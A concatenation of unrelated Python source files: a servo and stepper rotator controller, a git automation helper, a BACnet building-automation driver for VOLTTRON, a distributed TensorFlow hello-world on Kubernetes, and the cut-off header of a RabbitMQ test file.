def _write_el(self, degrees):
"""Lowlevel servo elevation control (internal method).
:param degrees: Angle to move servo
:type degrees: float
.. note::
This is the only function that directly writes to the servos (which
must be done in microseconds). This allows the rest of the class to
operate in degrees. It also keeps the code more Pythonic.
.. note::
The degrees to microseconds conversion uses a line fit with two points:
(0deg, 500us), (180deg, 2500us).
Therefore the coefficients are:
m = (2500 - 500) / (180 - 0) = 200 / 18
b = 500
"""
# Input processing
degrees += 90 # 0deg el is the servo midpoint, no 90deg servo
if degrees > 180 or degrees < 0:
exceptstr = 'Servo elevation must map into the 0-180deg servo range (-90 to 90deg el)'
raise RotatorClassException(exceptstr)
if degrees - 90 == self.el: # don't write if not moving (self.el is stored without the +90 offset)
return
# Move servo and then hold it in that position
# TODO: Decide if resetting pulsewidth is necessary
us = 200 / 18.0 * degrees + 500 # eq: (2500-500)/(180-0) + 500
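# e.g. degrees=90 (0deg el after the +90 offset): us = 200/18 * 90 + 500 = 1500us, the servo midpoint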
self.mutex.acquire()
self.pi.set_servo_pulsewidth(self.pin_el, us)
# time.sleep(0.2) # experimentally determined delay
# self.pi.set_servo_pulsewidth(self.pin_el, 0)
self.mutex.release()
# Save state
self.el = degrees - 90
self.mutex.acquire()
self._savestate()
self.mutex.release()
def _write_az(self, degrees):
"""Low level stepper azimuth control (internal method).
:param degrees: Desired azimuth position in degrees
:type degrees: float
"""
# Input Processing
degrees %= 360 # azimuth wraps at 2pi
if degrees == self.az: # don't write if not moving
return
# Decide direction by minimizing angular distance
# Lots of if cases for figuring out what the right calculation is
# basically figuring out which side of the line between pos and its
# antipode you're on will tell
degrees %= 360 # wrap at 2pi
posmirror = (degrees + 180) % 360 # antipode of degrees
if self.az < posmirror and self.az > degrees:
cw = True
dist = self.az - degrees
elif degrees > 180 and self.az > degrees:
cw = True
dist = self.az - degrees
elif degrees > 180 and self.az < posmirror:
cw = True
dist = 360 + self.az - degrees
elif self.az < degrees and self.az > posmirror:
cw = False
dist = degrees - self.az
elif degrees < 180 and self.az < degrees:
cw = False
dist = degrees - self.az
elif degrees < 180 and self.az > posmirror:
cw = False
dist = 360 + degrees - self.az
else: # just compute distance and go ccw if pos dist, cw if neg dist
dist = abs(degrees - self.az)
cw = True if self.az < degrees else False
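# e.g. self.az=350, degrees=10: posmirror=190, so the last elif fires
# (degrees < 180 and self.az > posmirror) -> ccw with dist = 360 + 10 - 350 = 20,
# instead of sweeping 340 degrees the other way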
# Step motor: set direction pin first (also re-asserted in the branches below)
if cw:
self.pi.write(self.pin_dir, 1)
else:
self.pi.write(self.pin_dir, 0)
time.sleep(self.step_delay / 1000.0) # setup time (step_delay is in milliseconds)
# Determine num steps and rotate
# CW
if cw:
self.pi.write(self.pin_dir, 1) # CW mode
time.sleep(0.001) # propagation delay
steps = round(dist / self.step_angle) # how many steps
for i in range(steps):
self.mutex.acquire()
self.pi.write(self.pin_az, 1)
time.sleep(self.step_delay / 1000.0) # delay in ms
self.pi.write(self.pin_az, 0)
self.mutex.release()
time.sleep(self.step_delay / 1000.0)
# CCW
else:
self.pi.write(self.pin_dir, 0) # CCW mode
time.sleep(0.001) # propagation delay
steps = round(dist / self.step_angle) # how many steps
for i in range(steps):
self.mutex.acquire()
self.pi.write(self.pin_az, 1)
time.sleep(self.step_delay / 1000.0)
self.pi.write(self.pin_az, 0)
self.mutex.release()
time.sleep(self.step_delay / 1000.0)
# Record actual azimuth relative to the previous position (direction-aware, wrapped at 360)
moved = steps * self.step_angle
self.az = (self.az - moved) % 360 if cw else (self.az + moved) % 360
self.mutex.acquire()
self._savestate()
self.mutex.release()
def _savestate(self):
"""Overwrites rotator position to persistent file (internal method).
.. note::
Update az and el BEFORE calling this method.
"""
self.statefile.truncate(0) # wipe file
self.statefile.write('Az:{:.0f}El:{:.0f}'.format(self.az, self.el))
self.statefile.flush()
# TODO: Test spline generation
def _spline_trajectory(self, p0, pf, dt=0.25):
"""Generate a smoothed servo movement trajectory over time dt.
:param p0: Initial angular position of servo in degrees.
:type p0: float
:param pf: Final angular position of servo in degrees.
:type pf: float
:param dt: Time to reach final position in seconds. (Default 0.25)
:type dt: float
:returns: tuple of positions in degrees
:rtype: float tuple
.. note::
These equations use the assumption that initial and final velocities
are 0. You should be able to find them in any robotics text covering
trajectory generation for manipulators.
.. note::
The delay time between movements should be dt / Rotator.num_pts.
All movements are in equal amounts of time
"""
# default case: p0 = pf
coeffs = [0] * self.num_pts # spline coefficient array
degrees = [p0] * self.num_pts # trajectory
# movement case
if p0 != pf:
# spline coefficients in degrees:
coeffs[3] = p0
coeffs[2] = 0
coeffs[1] = 3/pow(dt, 2) * (pf - p0)
coeffs[0] = 2/pow(dt, 3) * (-pf + p0)
# computing trajectory points:
# skip 1st value because it's just p0, and that is covered in
# the default case above
for i in range(1, self.num_pts):
t = dt / self.num_pts * i # time in trajectory
degrees[i] = (coeffs[0] * pow(t, 3) + coeffs[1] * pow(t, 2) +
coeffs[2] * t + coeffs[3])
return tuple(degrees)
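# Boundary-condition check (follows from the coefficients above):
# p(0) = coeffs[3] = p0, p(dt) = 2*(p0-pf) + 3*(pf-p0) + p0 = pf,
# and p'(0) = 0, p'(dt) = 3*coeffs[0]*dt**2 + 2*coeffs[1]*dt = 0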
if __name__ == '__main__':
print('This is the Rotator class file!')
|
repo.py
|
import os
from dataclasses import dataclass, field
from threading import Thread
from typing import Dict, List, Union
import cli
from plib import Path
from . import vpn
no_pull_changes_message = "Already up to date."
def ask_push():
response = cli.prompt("Commit message", default=False)
return response
def is_remote(command: str) -> bool:
return command in ("push", "pull")
def is_reachable(remote: str) -> bool:
return cli.check_succes(f"ping -c 1 {remote}")
def is_vpn_error(exc: Exception):
vpn_error_messages = ("Could not resolve host", "status 128")
error_message = str(exc)
return any(m in error_message for m in vpn_error_messages)
@dataclass
class Repo:
path: Path
pull_output: str = None
changes: str = None
status: List[str] = field(default_factory=list)
committed: List[str] = field(default_factory=list)
update: bool = False
vpn_activated: bool = False
changed_files: Union[Dict[str, str], None] = None
@property
def title(self) -> str:
return self.path.name.capitalize()
@property
def auto_add(self) -> bool:
auto_add_skip_file = Path.assets / "autogit" / "skip_auto_add.yaml"
return self.path.name not in auto_add_skip_file.yaml
def check_updates(self):
self.changes = (
self.get("diff") or self.get("ls-files --others --exclude-standard")
if self.auto_add
else ""
)
self.status = self.get_status() if self.auto_add else []
# committed before but the push has failed
self.committed = not (self.changes or self.status) and [
line
for line in self.lines("status --porcelain -b")
if "ahead" in line and "##" in line
]
self.update = bool(self.changes or self.status or self.committed)
def process_updates(self):
self.clear()
if self.changes:
self.add()
if self.status or self.committed:
if self.status:
self.show_status()
pull = Thread(target=self.do_pull, kwargs={"check": False})
pull.start()
commit_message = ask_push()
while commit_message == "show":
self.clear()
self.show_status(verbose=True)
commit_message = ask_push()
if commit_message and len(commit_message) > 5:
with cli.console.status("Formatting"):
self.run_hooks()
if self.status:
pull.join()
self.get(f'commit -m"{commit_message}"')
self.run("push")
else:
print("cleaned")
else:
commit_info = self.committed[0].replace("[", "\[").replace("## ", "")
if cli.confirm(f"Push ({commit_info}) ?", default=True):
self.run("push")
cli.run("clear")
else:
print("cleaned")
def run_hooks(self, real_commit=True):
# only lint python files
python_files_changed = [f for f in self.changed_files if f.endswith(".py")]
if python_files_changed:
cli.get("isort --apply -q", *python_files_changed, cwd=self.path)
if real_commit:
if (self.path / ".pre-commit-config.yaml").exists():
cli.get("pre-commit run", check=False, cwd=self.path)
self.add()
elif python_files_changed:
cli.run("black -q", *python_files_changed, cwd=self.path)
def show_status(self, verbose=False):
if self.changed_files is None:
self.changed_files = {
filenames[-1]: symbol
for line in self.status
for symbol, *filenames in (line.split(),)
}
status = self.lines("status -v", capture_output_tty=True)
diff_indices = [i for i, line in enumerate(status) if "diff" in line] + [
len(status)
]
lines_amount = os.get_terminal_size().lines * 2 - 6
symbols = {"M": "*", "D": "-", "A": "+", "R": "*", "C": "*"}
colors = {"M": "blue", "D": "red", "A": "green", "R": "blue", "C": "blue"}
for start, stop in zip(diff_indices, diff_indices[1:]):
title = status[start]
for filename, symbol in self.changed_files.items():
if filename in title:
color = colors.get(symbol, "")
line = symbols.get(symbol, "") + f" [bold {color}]{filename}\n"
cli.console.print(line, end="")
diff = [
part
for line in status[start:stop]
for part in line.split("@@")
if "\x1b[1m" not in line
] + [""]
if lines_amount > len(diff) or verbose:
lines_amount -= len(diff)
for d in diff:
print(d)
def clear(self):
cli.console.clear()
cli.console.rule(self.title)
def add(self):
self.get("add .")
self.status = self.get_status()
def get_status(self):
return self.lines("status --porcelain")
def do_pull(self, check=True):
self.pull_output = self.get("pull", check=check)
def show_pull(self):
if no_pull_changes_message not in self.pull_output:
self.clear()
print(self.pull_output)
return True
def lines(self, command, **kwargs):
lines = self.get(command, **kwargs).split("\n")
lines = [l for l in lines if l]
return lines
def get(self, command, **kwargs):
output = self.run(command, **kwargs, capture_output=True)
if "capture_output_tty" not in kwargs:
output = output.stdout
return output.strip()
def run(self, command, **kwargs):
self.before_command(command)
try:
result = cli.run(f"git -C {self.path} {command}", **kwargs)
except Exception as e:
if is_vpn_error(e):
if command == "push":
pprint("Activating VPN..")
vpn.connect_vpn()
self.vpn_activated = True
result = cli.run(f"git -C {self.path} {command}", **kwargs)
elif command == "pull":
# ignore not reachable after vpn when pulling
result = cli.run(f"echo {no_pull_changes_message}", **kwargs)
else:
raise e
else:
raise e
self.after_command(command)
return result
def before_command(self, command):
if is_remote(command):
url = self.get("config remote.origin.url")
self.check_password(url)
def check_password(self, url):
if "@" not in url:
url = url.replace("https://", f'https://{os.environ["gittoken"]}@')
self.run(f"config remote.origin.url {url}")
def check_vpn(self, url):
domain = url.split("@")[1].split("/")[0]
if not is_reachable(domain):
vpn.connect_vpn()
self.vpn_activated = True
def after_command(self, _):
if self.vpn_activated:
vpn.disconnect_vpn()
self.vpn_activated = False
|
bacnet.py
|
'''
Copyright (c) 2016, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
'''
'''
This material was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the United States Department of Energy, nor Battelle,
nor any of their employees, nor any jurisdiction or organization
that has cooperated in the development of these materials, makes
any warranty, express or implied, or assumes any legal liability
or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed,
or represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or
service by trade name, trademark, manufacturer, or otherwise does
not necessarily constitute or imply its endorsement, recommendation,
or favoring by the United States Government or any agency thereof,
or Battelle Memorial Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the
United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
'''
#!/usr/bin/python
"""
BACnet sMAP/VOLTTRON driver
"""
import os
from csv import DictReader
from collections import defaultdict
from ConfigParser import ConfigParser
from Queue import Queue, Empty
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
from twisted.internet import reactor
from base import BaseSmapVolttron, BaseRegister, BaseInterface
from bacpypes.debugging import class_debugging, ModuleLogger
from bacpypes.task import RecurringTask
from bacpypes.apdu import ConfirmedRequestSequence, WhoIsRequest
import bacpypes.core
import threading
#Tweaks to BACpypes to make it play nice with Twisted.
bacpypes.core.enable_sleeping()
bacpypes.core.SPIN = 0.1
from bacpypes.pdu import Address
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.object import get_datatype
from bacpypes.apdu import (ReadPropertyRequest,
WritePropertyRequest,
Error,
AbortPDU,
ReadPropertyACK,
SimpleAckPDU,
ReadPropertyMultipleRequest,
ReadPropertyMultipleACK,
PropertyReference,
ReadAccessSpecification,
encode_max_apdu_response)
from bacpypes.primitivedata import Enumerated, Integer, Unsigned, Real, Boolean, Double
from bacpypes.constructeddata import Array, Any
from bacpypes.basetypes import ServicesSupported
from bacpypes.task import TaskManager
path = os.path.dirname(os.path.abspath(__file__))
configFile = os.path.join(path, "bacnet_example_config.csv")
#Make sure the TaskManager singleton exists...
task_manager = TaskManager()
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# reference a simple application
this_application = None
server = None
#IO callback
class IOCB:
def __init__(self, request):
# requests and responses
self.ioRequest = request
self.ioDefered = Deferred()
@class_debugging
class BACnet_application(BIPSimpleApplication, RecurringTask):
def __init__(self, *args):
BIPSimpleApplication.__init__(self, *args)
RecurringTask.__init__(self, 250)
self.request_queue = Queue()
# assigning invoke identifiers
self.nextInvokeID = 1
# keep track of requests to line up responses
self.iocb = {}
self.install_task()
def process_task(self):
while True:
try:
iocb = self.request_queue.get(False)
except Empty:
break
self.request(iocb)
def submit_request(self, iocb):
self.request_queue.put(iocb)
def get_next_invoke_id(self, addr):
"""Called to get an unused invoke ID."""
initialID = self.nextInvokeID
while 1:
invokeID = self.nextInvokeID
self.nextInvokeID = (self.nextInvokeID + 1) % 256
# see if we've checked for them all
if initialID == self.nextInvokeID:
raise RuntimeError("no available invoke ID")
# see if this one is used
if (addr, invokeID) not in self.iocb:
break
return invokeID
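# e.g. starting from nextInvokeID=255 the candidates wrap 255 -> 0 -> 1 -> ...;
# if every (address, id) pair is already outstanding we return to the initial ID and raise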
def request(self, iocb):
apdu = iocb.ioRequest
if isinstance(apdu, ConfirmedRequestSequence):
# assign an invoke identifier
apdu.apduInvokeID = self.get_next_invoke_id(apdu.pduDestination)
# build a key to reference the IOCB when the response comes back
invoke_key = (apdu.pduDestination, apdu.apduInvokeID)
# keep track of the request
self.iocb[invoke_key] = iocb
BIPSimpleApplication.request(self, apdu)
def confirmation(self, apdu):
# build a key to look for the IOCB
invoke_key = (apdu.pduSource, apdu.apduInvokeID)
# find the request
iocb = self.iocb.get(invoke_key, None)
if iocb is None:
# no matching request for this response; nothing to errback on
return
del self.iocb[invoke_key]
if isinstance(apdu, AbortPDU):
iocb.ioDefered.errback(RuntimeError("Device communication aborted: " + str(apdu)))
return
if isinstance(apdu, Error):
iocb.ioDefered.errback(RuntimeError("Error during device communication: " + str(apdu)))
return
elif (isinstance(iocb.ioRequest, ReadPropertyRequest) and
isinstance(apdu, ReadPropertyACK)):
# find the datatype
datatype = get_datatype(apdu.objectIdentifier[0], apdu.propertyIdentifier)
if not datatype:
iocb.ioDefered.errback(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (apdu.propertyArrayIndex is not None):
if apdu.propertyArrayIndex == 0:
value = apdu.propertyValue.cast_out(Unsigned)
else:
value = apdu.propertyValue.cast_out(datatype.subtype)
else:
value = apdu.propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
iocb.ioDefered.callback(value)
elif (isinstance(iocb.ioRequest, WritePropertyRequest) and
isinstance(apdu, SimpleAckPDU)):
iocb.ioDefered.callback(apdu)
return
elif (isinstance(iocb.ioRequest, ReadPropertyMultipleRequest) and
isinstance(apdu, ReadPropertyMultipleACK)):
result_dict = {}
for result in apdu.listOfReadAccessResults:
# here is the object identifier
objectIdentifier = result.objectIdentifier
# now come the property values per object
for element in result.listOfResults:
# get the property and array index
propertyIdentifier = element.propertyIdentifier
propertyArrayIndex = element.propertyArrayIndex
# here is the read result
readResult = element.readResult
# check for an error
if readResult.propertyAccessError is not None:
error_obj = readResult.propertyAccessError
msg = 'ERROR DURING SCRAPE (Class: {0} Code: {1})'
print msg.format(error_obj.errorClass, error_obj.errorCode)
else:
# here is the value
propertyValue = readResult.propertyValue
# find the datatype
datatype = get_datatype(objectIdentifier[0], propertyIdentifier)
if not datatype:
iocb.ioDefered.errback(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (propertyArrayIndex is not None):
if propertyArrayIndex == 0:
value = propertyValue.cast_out(Unsigned)
else:
value = propertyValue.cast_out(datatype.subtype)
else:
value = propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
result_dict[objectIdentifier[0], objectIdentifier[1], propertyIdentifier] = value
iocb.ioDefered.callback(result_dict)
else:
iocb.ioDefered.errback(TypeError('Unsupported Request Type'))
def block_for_sync(d, timeout=None):
q = Queue()
d.addBoth(q.put)
try:
ret = q.get(True, timeout)
except Empty:
raise IOError('Communication with device timed out.')
if isinstance(ret, Failure):
ret.raiseException()
else:
return ret
class BACnetRegister(BaseRegister):
def __init__(self, instance_number, object_type, property_name, read_only, pointName, units, description = ''):
super(BACnetRegister, self).__init__("byte", read_only, pointName, units, description = '')
self.instance_number = int(instance_number)
self.object_type = object_type
self.property = property_name
# find the datatype
self.datatype = get_datatype(object_type, property_name)
if self.datatype is None:
raise TypeError('Invalid Register Type')
if not issubclass(self.datatype, (Enumerated,
Unsigned,
Boolean,
Integer,
Real,
Double)):
raise TypeError('Invalid Register Type')
if issubclass(self.datatype, (Enumerated,
Unsigned,
Boolean,
Integer)):
self.python_type = int
else:
self.python_type = float
def get_state_async(self, bac_app, address):
request = ReadPropertyRequest(
objectIdentifier=(self.object_type, self.instance_number),
propertyIdentifier=self.property)
request.pduDestination = address
iocb = IOCB(request)
bac_app.submit_request(iocb)
return iocb.ioDefered
def get_state_sync(self, bac_app, address):
value = None
try:
value = block_for_sync(self.get_state_async(bac_app, address), 5)
except IOError as e:
print "Error with device communication:", e
return value
def set_state_async_callback(self, result, set_value):
if isinstance(result, SimpleAckPDU):
return set_value
raise RuntimeError("Failed to set value: " + str(result))
def set_state_async(self, bac_app, address, value):
if not self.read_only:
request = WritePropertyRequest(
objectIdentifier=(self.object_type, self.instance_number),
propertyIdentifier=self.property)
# save the value
if self.datatype is Integer:
value = int(value)
elif self.datatype is Real:
value = float(value)
bac_value = self.datatype(value)
request.propertyValue = Any()
request.propertyValue.cast_in(bac_value)
request.pduDestination = address
iocb = IOCB(request)
bac_app.submit_request(iocb)
iocb.ioDefered.addCallback(self.set_state_async_callback, value)
return iocb.ioDefered
raise TypeError('This register is read only.')
def set_state_sync(self, bac_app, address, value):
value = None
try:
value = block_for_sync(self.set_state_async(bac_app, address, value), 5)
except IOError as e:
print "Error with device communication:", e
return value
class BACnetInterface(BaseInterface):
def __init__(self, self_address, target_address,
max_apdu_len=1024, seg_supported='segmentedBoth',
obj_id=599, obj_name='sMap BACnet driver',
ven_id=15,
config_file=configFile, **kwargs):
super(BACnetInterface, self).__init__(**kwargs)
self.reverse_point_map = {}
self.object_property_map = defaultdict(list)
self.setup_device(self_address, max_apdu_len=max_apdu_len, seg_supported=seg_supported,
obj_id=obj_id, obj_name=obj_name,
ven_id=ven_id)
self.parse_config(config_file)
self.target_address = Address(target_address)
self.ping_target(self.target_address)
def insert_register(self, register):
super(BACnetInterface, self).insert_register(register)
self.reverse_point_map[register.object_type,
register.instance_number,
register.property] = register.point_name
self.object_property_map[register.object_type,
register.instance_number].append(register.property)
def ping_target(self, address):
#Some devices (mostly RemoteStation addresses behind routers) will not be reachable without
# first establishing the route to the device. Sending a directed WhoIsRequest will
# settle that for us when the response comes back.
request = WhoIsRequest()
request.pduDestination = address
iocb = IOCB(request)
this_application.submit_request(iocb)
def setup_device(self, address,
max_apdu_len=1024, seg_supported='segmentedBoth',
obj_id=599, obj_name='sMap BACnet driver',
ven_id=15):
global this_application
#We use a singleton device
if this_application is not None:
return
print 'seg_supported', seg_supported
print 'max_apdu_len', max_apdu_len
print 'obj_id', obj_id
print 'obj_name', obj_name
print 'ven_id', ven_id
#Check to see if they gave a valid apdu length.
if encode_max_apdu_response(max_apdu_len) is None:
raise ValueError('Invalid max_apdu_len: Valid options are 50, 128, 206, 480, 1024, and 1476')
this_device = LocalDeviceObject(
objectName=obj_name,
objectIdentifier=obj_id,
maxApduLengthAccepted=max_apdu_len,
segmentationSupported=seg_supported,
vendorIdentifier=ven_id,
)
# build a bit string that knows about the bit names and leave it empty. We respond to NOTHING.
pss = ServicesSupported()
# set the property value to be just the bits
this_device.protocolServicesSupported = pss.value
this_application = BACnet_application(this_device, address)
#We must use traditional python threads, otherwise the driver will
# hang during startup while trying to scrape actuator values.
# I think this is because the reactor hasn't started before we start trying
# to use the other threads.
#reactor.callInThread(bacpypes.core.run)
#reactor.addSystemEventTrigger("before", "shutdown", bacpypes.core.stop)
server_thread = threading.Thread(target=bacpypes.core.run)
# exit the BACnet App thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
#Mostly for testing by hand and initializing actuators.
def get_point_sync(self, point_name):
register = self.point_map[point_name]
return register.get_state_sync(this_application, self.target_address)
#Mostly for testing by hand.
def set_point_sync(self, point_name, value):
register = self.point_map[point_name]
return register.set_state_sync(this_application, self.target_address, value)
#Getting data in a async manner
def get_point_async(self, point_name):
register = self.point_map[point_name]
return register.get_state_async(this_application, self.target_address)
#setting data in a async manner
def set_point_async(self, point_name, value):
register = self.point_map[point_name]
return register.set_state_async(this_application, self.target_address, value)
def scrape_all_callback(self, result):
result_dict={}
for prop_tuple, value in result.iteritems():
name = self.reverse_point_map[prop_tuple]
result_dict[name] = value
return result_dict
def scrape_all(self):
read_access_spec_list = []
for obj_data, properties in self.object_property_map.iteritems():
obj_type, obj_inst = obj_data
prop_ref_list = []
for prop in properties:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = self.target_address
iocb = IOCB(request)
this_application.submit_request(iocb)
iocb.ioDefered.addCallback(self.scrape_all_callback)
return iocb.ioDefered
def parse_config(self, config_file):
if config_file is None:
return
with open(config_file, 'rb') as f:
configDict = DictReader(f)
for regDef in configDict:
#Skip lines that have no address yet.
if not regDef['Point Name']:
continue
io_type = regDef['BACnet Object Type']
read_only = regDef['Writable'].lower() != 'true'
point_name = regDef['Volttron Point Name']
index = int(regDef['Index'])
description = regDef['Notes']
units = regDef['Units']
property_name = regDef['Property']
register = BACnetRegister(index,
io_type,
property_name,
read_only,
point_name,
units,
description = description)
self.insert_register(register)
class BACnet(BaseSmapVolttron):
def setup(self, opts):
self.set_metadata('/', {'Extra/Driver' : 'volttron.drivers.bacnet.BACnet'})
super(BACnet, self).setup(opts)
def get_interface(self, opts):
target_ip_address = opts['ip_address']
bacnet_config_file = opts['bacnet_device_config']
config = opts.get('register_config', configFile)
bacnet_config = ConfigParser()
bacnet_config.read(bacnet_config_file)
# check for BACpypes section
if not bacnet_config.has_section('BACpypes'):
raise RuntimeError("INI file with BACpypes section required")
ini_obj = dict(bacnet_config.items('BACpypes'))
self_ip_address = ini_obj['address']
max_apdu_len = int(ini_obj.get('max_apdu_length', 1024))
seg_supported = ini_obj.get('segmented_supported', 'segmentedBoth')
obj_id = int(ini_obj.get('object_id', 599))
obj_name = ini_obj.get('object_name', 'sMap BACnet driver')
ven_id = int(ini_obj.get('vendor_id', 15))
return BACnetInterface(self_ip_address, target_ip_address,
max_apdu_len=max_apdu_len, seg_supported=seg_supported,
obj_id=obj_id, obj_name=obj_name,
ven_id=ven_id,
config_file=config)
if __name__ == "__main__":
from pprint import pprint
from time import sleep
import sys
iface = BACnetInterface(sys.argv[1], sys.argv[2], config_file='test2.csv')
def run_tests():
print 'Test'
r = iface.get_point_sync('RoomRealTemp2')
print 'RoomRealTemp2', r
r = iface.get_point_sync('RoomRealTemp1')
print 'RoomRealTemp1', r
r = iface.get_point_sync('OutsideAir')
print 'OutsideAir', r
r = iface.get_point_sync('Current1')
print 'Current1', r
r = iface.get_point_sync('Occupied')
print 'Occupied', r
r = iface.get_point_sync('Volt1')
print 'Volt1', r
new_value = 55.0 if r != 55.0 else 65.0
print 'Writing to Volt1:', new_value
r = iface.set_point_sync('Volt1', new_value)
print 'Volt1 change result', r
#For some reason on the test device if we try to read what
# we just wrote too quickly we'll get back the old value.
sleep(1)
r = iface.get_point_sync('Volt1')
print 'Volt1', r
def printvalue(value, name):
print name,':'
pprint(value)
d = iface.get_point_async('ProgrammingAnalogVariable1')
d.addCallback(printvalue, 'ProgrammingAnalogVariable1')
d = iface.get_point_async('Cool1')
d.addCallback(printvalue, 'Cool1')
d = iface.scrape_all()
d.addCallback(printvalue, 'all')
def end():
reactor.stop()
reactor.callLater(2, end)
reactor.callLater(0, run_tests)
reactor.run()
|
distributed-helloworld.py
|
import sys
import os
import math
import tensorflow as tf
from kubernetes import client, config
import socket
import fcntl
import struct
import time
import threading
# these globals are used to bootstrap the TF cluster
myindex = -99
ps_hosts = []
worker_hosts = []
def get_ip_address(ifname):
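    # Classic Linux recipe: the SIOCGIFADDR ioctl fills an ifreq struct for the
    # interface, and bytes 20:24 of the result hold the packed IPv4 address.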
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def startup():
global ps_hosts
global worker_hosts
global myindex
# The ip address of the pod is used to determine the index of
# the pod in the ClusterSpec.
myip = get_ip_address('eth0')
# Get the namespace from the service account
with open ("/run/secrets/kubernetes.io/serviceaccount/namespace", "r") as nsfile:
namespace = nsfile.readline()
# Get a list of pods that are part of this job
    # Since all pods may not be ready yet, the code will sleep and loop
# until all pod IPs are available.
config.load_incluster_config()
ready = False
while not ready:
ready = True
allpods = []
v1 = client.CoreV1Api()
podlist = v1.list_namespaced_pod(namespace, label_selector="lsf.ibm.com/jobId="+os.environ["LSB_JOBID"])
for pod in podlist.items:
            if pod.status.pod_ip is None:
ready = False
time.sleep(1)
continue
else:
allpods.append(pod.status.pod_ip)
    # Now that the pod list is complete, get ready for cluster spec generation
# by sorting the pod list by IP address.
allpods = sorted(allpods, key=lambda ip: socket.inet_aton(ip))
print "allpods " + str(allpods)
# Build the cluster configuration.
# Keep track of which index in the cluster spec
# corresponds to me.
ix = 0
for pod in allpods:
ps_hosts.append(pod + ":2221")
worker_hosts.append(pod + ":2222")
if pod == myip:
myindex = ix
ix = ix + 1
print "startup done. myindex: "+str(myindex)+", ps_hosts: "+str(ps_hosts)+", worker_hosts: "+str(worker_hosts)
def run_ps():
global ps_hosts
global worker_hosts
global myindex
print "ps_hosts: "+str(ps_hosts)+", myindex: "+str(myindex)
cluster = tf.train.ClusterSpec({"ps": ps_hosts, "worker": worker_hosts})
server = tf.train.Server(cluster,
job_name="ps",
task_index=myindex)
# to enable the parameter server to exit gracefully, make some queues that
# workers can write to, to indicate that they are done. when a parameter
# server sees that all workers are done, then it will exit.
with tf.device('/job:ps/task:%d' % myindex):
queue = tf.FIFOQueue(cluster.num_tasks('worker'), tf.int32, shared_name='done_queue%d' % myindex)
# wait for the queue to be filled
with tf.Session(server.target) as sess:
for i in range(cluster.num_tasks('worker')):
sess.run(queue.dequeue())
print('ps:%d received "done" from worker:%d' % (myindex, i))
print('ps:%d quitting' % myindex)
def run_worker():
global ps_hosts
global worker_hosts
global myindex
cluster = tf.train.ClusterSpec({"ps": ps_hosts, "worker": worker_hosts})
server = tf.train.Server(cluster,
job_name="worker",
task_index=myindex)
# Assigns ops to the local worker by default.
with tf.device(tf.train.replica_device_setter(
worker_device="/job:worker/task:%s" % myindex,
cluster=cluster)):
        # set up queues to notify the ps tasks when it's time to exit
stop_queues = []
# create a shared queue on the worker which is visible on /job:ps/task:%d
for i in range(cluster.num_tasks('ps')):
with tf.device('/job:ps/task:%d' % i):
stop_queues.append(tf.FIFOQueue(cluster.num_tasks('worker'), tf.int32, shared_name='done_queue%d' % i).enqueue(1))
# Create a "supervisor", which oversees the training process.
sv = tf.train.Supervisor(is_chief=(myindex==0))
# The supervisor takes care of session initialization, restoring from
# a checkpoint, and closing when done or an error occurs.
with sv.managed_session(server.target) as sess:
print "*********************"
print "Hello from worker %d!" % myindex
print "*********************"
            # notify the parameter servers that it's time to exit.
for op in stop_queues:
sess.run(op)
# Ask for all the services to stop.
sv.stop()
if __name__ == "__main__":
# Each pod is both a parameter server and a worker
# Each runs in a different thread.
startup()
threads = [
threading.Thread(target=run_ps),
threading.Thread(target=run_worker)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test_impl_rabbit.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
